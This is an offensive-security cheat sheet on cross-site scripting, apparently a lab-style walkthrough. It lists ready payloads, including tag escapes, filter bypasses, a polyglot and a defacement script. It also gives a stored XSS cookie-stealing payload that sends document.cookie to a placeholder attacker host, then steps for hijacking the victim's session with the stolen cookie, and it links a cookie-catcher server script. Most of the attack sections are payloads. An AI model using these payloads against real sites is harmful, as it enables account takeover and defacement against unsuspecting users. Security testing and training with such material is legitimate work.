# XSS

### Payloads

```javascript
# Standard XSS Payload
<script>alert('XSS');</script>

# Input tag escape
"><script>alert('XSS');</script>

# Escape textarea tag
</textarea><script>alert('XSS');</script>

# Escape Javascript code
';alert('XSS');//

# Bypass filters that strip out malicious words such like "script"
<sscriptcript>alert('XSS');</sscriptcript>

# Polyglot payload (can bypass multiple filters)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
```

### Payload List

Payload list: <https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt>

## Stored XSS

### Defacing HTML Titles

Stored XSS can be used to deface web applications in various ways. One of them is rewriting HTML titles and other elements. In the example below we alter the HTML title "XSS Playground".

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FU6XjZmOORi1kqxaNiJAz%2Fimage.png?alt=media&#x26;token=8b3aca73-d975-4f47-8508-d99cb2527621" alt=""><figcaption></figcaption></figure>

First, we need to identify the element ID of the title. Using the browser's inspector we can find the element that contains the string:

```
<span id="thm-title">XSS Playground</span>
```

As shown in the browser inspector:

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fw58Sc0IEzHlDqC34T7Kl%2Fimage.png?alt=media&#x26;token=24352d7e-3249-46fb-9fbc-c419090e6274" alt=""><figcaption></figcaption></figure>

The following payload can be used to alter the title. It can be inserted into the comment section of the web application.

```
<script>document.getElementById('thm-title').innerHTML="Defaced";</script>
```

After the payload has been inserted we can see that the HTML title has changed.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fti0B2nHk5fyIXzQ6kCdm%2Fimage.png?alt=media&#x26;token=b0a872f1-5e6a-4a72-bf0b-258dab67f034" alt=""><figcaption></figcaption></figure>

### Payloads for changing an element by ID

```
<script>document.getElementById('ID').innerHTML="Defaced";</script>
<script>document.querySelector('#ID').textContent = 'Defaced'</script>
```

### Cookie Stealing

Cookie stealing can be performed via Reflected and Stored XSS. With Stored XSS, anyone who visits the affected web page can have their cookie sent to an adversary. The cookie can then potentially be used to log into the application as the victim's user account.

The script linked below sets up an HTTP server on the attacker's machine which catches cookies from an unsuspecting user's browser session when they trigger the stored XSS.

Script: <https://raw.githubusercontent.com/lnxg33k/misc/master/XSS-cookie-stealer.py>

After downloading the script, alter the variables shown below to point back to the attacking system, then run the script with Python.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhG2kzk0ugr6VG0ZwXLLv%2Fimage.png?alt=media&#x26;token=10f1904f-becb-4c01-8736-657afb54e25c" alt=""><figcaption></figcaption></figure>

After the script is set up and running, the attacker injects the Stored XSS payload shown below into the vulnerable web page.

```
<script>var i=new Image;i.src="http://<IP>/?"+document.cookie;</script>
```

When the victim next visits the affected web page their cookie is sent to the attacker.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F35asy88xryUS82rgoMBK%2Fimage.png?alt=media&#x26;token=42014c94-3f2c-470b-9882-04e6a4b7b60c" alt=""><figcaption></figcaption></figure>

Where the script receives the cookie:

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fvx05uXiK3Ah5I6eUVqwc%2Fimage.png?alt=media&#x26;token=b3dd04a8-84c1-43d0-8bf2-3107aa26869d" alt=""><figcaption></figcaption></figure>

The cookie is then placed into the attacker's browser session.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvsZkGyw3eZ2vrK1MEK5B%2Fimage.png?alt=media&#x26;token=51082d48-cee3-48da-a41c-40d6fe9f07f7" alt=""><figcaption></figcaption></figure>

After a page refresh the adversary is now logged in as the victim's user account.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Flo76QUam2CJFZY5Hs3mT%2Fimage.png?alt=media&#x26;token=12fec326-78b3-4af7-8851-546e1fe1e343" alt=""><figcaption></figcaption></figure>

## Reflected XSS

Reflected XSS "reflects" the injected script back to the victim's browser through vectors such as search functions, forms, and script contained in a URL.

Simple payload for proof of concept:

```
<script>alert('Hello')</script>
```

The page shown below reflects the search query into the URL of the web application. Using the payload above we can see how it is reflected back on the web page.

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOhpsFohTLPac1SUA9bjR%2Fimage.png?alt=media&#x26;token=72f7f3b7-d43d-443e-bc76-fdeffae299ec" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQdYIpRFEmsapPjRYUyNS%2Fimage.png?alt=media&#x26;token=9ac076b1-784a-4981-9512-fbae2558760d" alt=""><figcaption></figcaption></figure>

From above we can also see how this affects the URL for the web page.

```
http://<IP>/reflected?keyword=%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E
```

### Grabbing machine IP

```
<script>alert(window.location.hostname)</script>
```

<figure><img src="https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fvtrcp0esj90fwAjYLFo8%2Fimage.png?alt=media&#x26;token=1ade601a-fce2-4f75-8a39-82b06ede277a" alt=""><figcaption></figcaption></figure>

## Further Reading

GitHub: <https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md>
